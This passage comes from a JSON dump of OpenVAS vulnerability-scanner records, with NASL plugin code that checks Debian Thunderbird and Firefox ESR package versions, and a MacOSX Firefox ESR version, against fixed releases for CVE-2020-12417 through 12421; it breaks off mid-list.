res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-nn-no\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-pa-in\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-pl\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-pt-br\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-pt-pt\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-rm\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ro\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ru\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-si\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-sk\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-sl\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-sq\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-sr\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-sv-se\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-ta-lk\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-tr\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-uk\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-vi\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-zh-cn\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"thunderbird-l10n-zh-tw\", ver:\"1:68.10.0-1~deb9u1\", rls:\"DEB9\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T20:02:46", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-12419", "CVE-2020-12417", "CVE-2020-12418", "CVE-2020-12420", "CVE-2020-12421"], "description": "This host is installed with Mozilla\n Firefox ESR and is prone to multiple vulnerabilities.", "modified": "2020-07-16T00:00:00", "published": "2020-07-02T00:00:00", "id": "OPENVAS:1361412562310817213", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310817213", "type": "openvas", "title": "Mozilla Firefox ESR Security Updates (MacOSX)-June 30 2020 ", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nCPE = \"cpe:/a:mozilla:firefox_esr\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.817213\");\n script_version(\"2020-07-16T11:59:37+0000\");\n script_cve_id(\"CVE-2020-12417\", \"CVE-2020-12418\", \"CVE-2020-12419\", \"CVE-2020-12420\",\n \"CVE-2020-12421\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-16 11:59:37 +0000 (Thu, 16 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-07-02 11:52:59 +0530 (Thu, 02 Jul 2020)\");\n script_name(\"Mozilla Firefox ESR Security Updates (MacOSX)-June 30 2020 \");\n\n script_tag(name:\"summary\", value:\"This host is installed with Mozilla\n Firefox ESR and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Memory corruption due to missing sign-extension for ValueTags on ARM64.\n\n - Information disclosure due to manipulated URL object.\n\n - Use-after-free in nsGlobalWindowInner.\n\n - Use-After-Free when trying to connect to a STUN server.\n\n - Add-On updates did not respect the same certificate trust rules as software updates.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow\n attackers to conduct a denial-of-service or out-of-bounds read on affected system.\");\n\n script_tag(name:\"affected\", value:\"Mozilla Firefox ESR version before 68.10 on MacOSX.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Mozilla Firefox ESR version 68.10\n or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2020-25/\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_mozilla_prdts_detect_macosx.nasl\");\n script_mandatory_keys(\"Mozilla/Firefox-ESR/MacOSX/Version\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! infos = get_app_version_and_location( cpe:CPE, exit_no_version:TRUE) )\n exit( 0 );\n\nffVer = infos[\"version\"];\nffPath = infos[\"location\"];\n\nif(version_is_less(version:ffVer, test_version:\"68.10\")) {\n report = report_fixed_ver(installed_version:ffVer, fixed_version:\"68.10\", install_path:ffPath);\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T20:09:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-12419", "CVE-2020-12417", "CVE-2020-12418", "CVE-2020-12420", "CVE-2020-12421"], "description": "The remote host is missing an update for the ", "modified": "2020-07-16T00:00:00", "published": "2020-07-03T00:00:00", "id": "OPENVAS:1361412562310704713", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310704713", "type": "openvas", "title": "Debian: Security Advisory for firefox-esr (DSA-4713-1)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.704713\");\n script_version(\"2020-07-16T09:26:29+0000\");\n script_cve_id(\"CVE-2020-12417\", \"CVE-2020-12418\", \"CVE-2020-12419\", \"CVE-2020-12420\", \"CVE-2020-12421\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-16 09:26:29 +0000 (Thu, 16 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-07-03 03:01:09 +0000 (Fri, 03 Jul 2020)\");\n script_name(\"Debian: Security Advisory for firefox-esr (DSA-4713-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB(10|9)\");\n\n script_xref(name:\"URL\", value:\"https://www.debian.org/security/2020/dsa-4713.html\");\n script_xref(name:\"URL\", value:\"https://security-tracker.debian.org/tracker/DSA-4713-1\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'firefox-esr'\n package(s) announced via the DSA-4713-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple security issues have been found in the Mozilla Firefox\nweb browser, which could potentially result in the execution\nof arbitrary code.\");\n\n script_tag(name:\"affected\", value:\"'firefox-esr' package(s) on Debian Linux.\");\n\n script_tag(name:\"solution\", value:\"For the oldstable distribution (stretch), these problems have been fixed\nin version 68.10.0esr-1~deb9u1.\n\nFor the stable distribution (buster), these problems have been fixed in\nversion 68.10.0esr-1~deb10u1.\n\nWe recommend that you upgrade your firefox-esr packages.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ach\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-af\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-all\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-an\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ar\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ast\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-az\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-be\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bg\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bn\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-br\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-bs\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ca\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-cak\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-cs\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-cy\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-da\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-de\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-dsb\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-el\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-en-ca\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-en-gb\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-eo\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-ar\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-cl\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-es\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-es-mx\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-et\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-eu\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fa\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ff\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fi\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fr\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-fy-nl\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ga-ie\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gd\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gl\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gn\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-gu-in\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-he\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hi-in\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hr\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hsb\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hu\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-hy-am\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ia\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-id\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-is\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-it\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ja\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ka\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-kab\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-kk\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-km\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-kn\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ko\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-lij\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-lt\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-lv\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-mk\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-mr\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ms\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-my\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-nb-no\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ne-np\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-nl\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-nn-no\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-oc\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pa-in\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pl\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pt-br\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-pt-pt\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-rm\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ro\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ru\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-si\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sk\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sl\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-son\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sq\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sr\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-sv-se\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ta\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-te\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-th\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-tr\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-uk\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-ur\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-uz\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-vi\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-xh\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-zh-cn\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"firefox-esr-l10n-zh-tw\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ach\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-af\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-all\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-an\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ar\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ast\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-az\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-be\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bg\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bn\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-br\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-bs\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ca\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-cak\", ver:\"68.10.0esr-1~deb10u1\", rls:\"DEB10\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-cs\", 